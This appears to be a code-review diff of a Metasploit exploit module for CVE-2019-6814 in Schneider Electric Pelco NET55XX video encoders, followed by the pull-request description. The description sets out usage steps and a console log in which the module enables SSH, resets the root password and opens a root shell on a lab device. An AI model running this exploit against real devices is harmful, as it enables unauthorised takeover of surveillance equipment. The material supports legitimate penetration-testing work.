+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'net/ssh/command_stream'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -36,10 +34,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2019-6814'],
           ['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/']
         ],
-      'DefaultOptions'  =>
-        {
-          'EXITFUNC' => 'thread'
-        },
       'Payload'        =>
         {
           'Compat' => {
@@ -56,7 +50,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('USER_AGENT',  [ true,  "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]),
         OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']),
         OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10])
       ], self.class

--- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
+++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if xmlResponse.include? "NET5501" or xmlResponse.include? "NET5501-I" or xmlResponse.include? "NET5501-XT" or xmlResponse.include? "NET5504" or xmlResponse.include? "NET5500" or xmlResponse.include? "NET5516" or xmlResponse.include? "NET5508"
        return Exploit::CheckCode::Appears
     end
-       return Exploit::CheckCode::Safe
+       Exploit::CheckCode::Safe
   end
 
   def change_password


### PR DESCRIPTION
## Vulnerable Application

Schneider Eletric Pelco NET55XX Encoder (CVE 2019-6814)

Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550).
 This module exploits an inadequate access control vulnerability creating a malicious json request to`the webUI encoder, thus allowing the SSH service to be enabled and changing the root password.

## Verification Steps

- [ ] Start `msfconsole`
- [ ] `use  use exploit/linux/http/schneider_eletric_net55xx_encoder`
- [ ] `set RHOSTS [rhosts]`
- [ ] `set RPORT [rport]`
- [ ] `set NEW_PASSWORD [new password]`
- [ ] `exploit`
- [ ] Verify you get a root shell

## Options

This module can be as simple as setting the RHOST and NEW_PASSWORD option, and you're ready to go.

**NEW_PASSWORD**  

You should  set a new ssh password to the vulnerable device.


## Scenarios

**Schneider Electric Pelco Encoder NET5501-XT**

msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RHOSTS 192.168.34.2
RHOSTS  => 192.168.34.2
msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RPORT 80
RPORT  => 80
msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set NEW_PASSWORD msfrapid7
NEW_PASSWORD => msfrapid7
msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > run

[] 192.168.34.2:22 - Attempt to start a SSH connection...
[] 192.168.34.2:80 - Attempt to change the root password...
[+] 192.168.34.2:80 - Successfully changed the root password...
[+] 192.168.34.2:22 - Session established
[] Found shell.
[] Command shell session 1 opened (192.168.34.3:37033 -> 192.168.34.2:22) at 2019-07-03 10:57:07 -0400

uname -a;id
Linux NET5501-XT-K61200103 2.6.37 #1 PREEMPT Fri Aug 8 04:33:08 KST 2014 armv7l unknown
uid=0(root) gid=0(root) groups=0(root)